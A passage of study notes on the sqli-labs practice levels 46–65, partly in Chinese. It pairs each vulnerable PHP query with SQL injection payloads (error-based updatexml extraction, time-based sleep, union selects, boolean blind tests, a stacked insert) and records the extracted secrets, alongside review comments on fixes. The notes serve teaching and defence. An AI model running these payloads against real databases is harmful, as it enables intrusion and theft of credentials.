$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
a');insert into users values(23,'j','j')#
同上
四十六 報錯
// Less-46: the sort parameter is spliced into ORDER BY. Bind placeholders cannot carry
// identifiers, so the fix is an allow-list: map the request value onto a fixed set of column
// names (and ASC/DESC) and reject anything else.
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";
sort=1 desc 或者asc,顯示結果不同,表明可以注入
sort=1 and updatexml(1,concat(0x23,database()),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1) 顯示不完全
四十七
// Less-47: quoting the sort value turns it into a string constant (ORDER BY a constant is a
// no-op), and a quote in the value still closes the literal. Allow-list as in Less-46.
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY '$id'";
sort=1' and updatexml(1,concat(0x23,database()),1)%23
sort=1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
sort=1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23 顯示不完全
四十八 錯誤不回顯 時間盲注
// Less-48: as Less-46 but DB errors are not echoed, so the notes fall back to a timing oracle.
// Suppressing error output is good practice but is not a fix; allow-list the sort column and
// alert on unexpectedly slow queries from the web user.
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23
四十九 錯誤不回顯 時間盲注
// Less-49: quoted variant of Less-48; see Less-47 for why the quotes do not help.
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23
五十 時間盲注 堆疊注入(參考上面)
// Less-50: as Less-48; the heading adds that multi-statement execution is enabled here.
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23
五十一 時間盲注
// Less-51: quoted variant; see Less-47.
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23
五十二 時間盲注
// Less-52: as Less-48.
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23
五十三 時間盲注
// Less-53: quoted variant; see Less-47.
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23
五十四
// Less-54: same concatenation as Less-29; the notes record the challenge table/column names
// found in the `challenges` schema on the "//" lines below.
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//sj7vpktxiq
1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='sj7vpktxiq'%23
//id,sessid,secret_TXLH,tryy
1' and 1=2 union select 1,group_concat(sessid),3 from challenges.sj7vpktxiq%23
//d1c38a09acc34845c6be3a127a5aacaf
1' and 1=2 union select 1,group_concat(secret_TXLH),3 from challenges.sj7vpktxiq%23
//DwhfpvM0dzKLEqw9hi3PeJzY
五十五
// Less-55: numeric, parenthesised. NOTE(review): validate $id as an integer or bind it.
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
1) and 1=2 union select 1,database(),3%23
1) and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//xwflfwldpp
1) and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='xwflfwldpp'%23
//id,sessid,secret_DMUI,tryy
1)and 1=2 union select 1,group_concat(secret_DMUI),3 from challenges.xwflfwldpp%23
//YBNwglaRUDwbJ1Ze082Ju1Sn
五十六
// Less-56: parenthesised single-quoted literal; same defect as Less-40.
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
1') and 1=2 union select 1,database(),3%23
1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//z4d4ffn83s
1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='z4d4ffn83s'%23
//id,sessid,secret_Y8GA,tryy
1') and 1=2 union select 1,group_concat(secret_Y8GA),3 from challenges.z4d4ffn83s%23
//PsQNyhePjSzrPUvoEdQruEx6
五十七
// Less-57: double-quote wrapping by concatenation; see Less-30.
$id= '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1" and 1=2 union select 1,database(),3%23
1" and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//4i3eu5w9m5
1" and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='4i3eu5w9m5'%23
//id,sessid,secret_YZ8G,tryy
1" and 1=2 union select 1,group_concat(secret_YZ8G),3 from challenges.4i3eu5w9m5%23
//kExPbOrEz78G0bfUGYmNpEJs
五十八
// Less-58: as Less-54; this level returns DB error text to the client, which is the channel
// the updatexml() inputs below read from. NOTE(review): never surface raw DB errors to users.
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and updatexml(1,concat(0x23,database()),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//5z3vsai61i
1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='5z3vsai61i')),1)%23
//id,sessid,secret_C8ER,tryy
1' and updatexml(1,concat(0x23,(select group_concat(secret_C8ER)from challenges.5z3vsai61i)),1)%23
//hmgTXQczwr2neRRzr1m9JvWO
五十九
// Less-59: numeric context with error echo; see Less-58.
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1 and updatexml(1,concat(0x23,database()),1)%23
1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//h6hi5xoec7
1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='h6hi5xoec7')),1)%23
//id,sessid,secret_AI69,tryy
1 and updatexml(1,concat(0x23,(select group_concat(secret_AI69)from challenges.h6hi5xoec7)),1)%23
//0g7eQdUtHCmXtr4o8ZySKoYg
六十
// Less-60: wrapped in ("…") by concatenation; the delimiter changes, the exposure does not.
$id = '("'.$id.'")';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1") and updatexml(1,concat(0x23,database()),1)%23
1") and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//uw2q08bttr
1") and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='uw2q08bttr')),1)%23
//id,sessid,secret_BUFB,tryy
1") and updatexml(1,concat(0x23,(select group_concat(secret_BUFB)from challenges.uw2q08bttr)),1)%23
//yJSBxWNO7xmCvhsQNNOQu2Y2
六十一
// Less-61: double-parenthesised single-quoted literal; same defect as Less-40.
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
1')) and updatexml(1,concat(0x23,database()),1)%23
1')) and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//avy2e9297x
1')) and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='avy2e9297x')),1)%23
//id,sessid,secret_NSKU,tryy
1')) and updatexml(1,concat(0x23,(select group_concat(secret_NSKU)from challenges.avy2e9297x)),1)%23
//8EhMs3hgKrmAcsmlJn4wVrSh
六十二 盲注
// Less-62: no data or error is echoed, so the notes use a boolean oracle (row present / absent).
// Hiding output does not remove the defect; bind $id.
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
1') and length(database())=10 %23
challenges
1') and ascii(substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1,1))<101%23
六十三 盲注
// Less-63: as Less-62 with a plain single-quoted literal.
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and length(database())=10 %23
六十四 盲注
// Less-64: numeric, double-parenthesised. NOTE(review): validate $id as an integer or bind it.
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
1)) and length(database())=10 %23
六十五 盲注
// Less-65: double-quote wrapping plus parentheses; see Less-31.
$id = '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
1") and length(database())=10 %23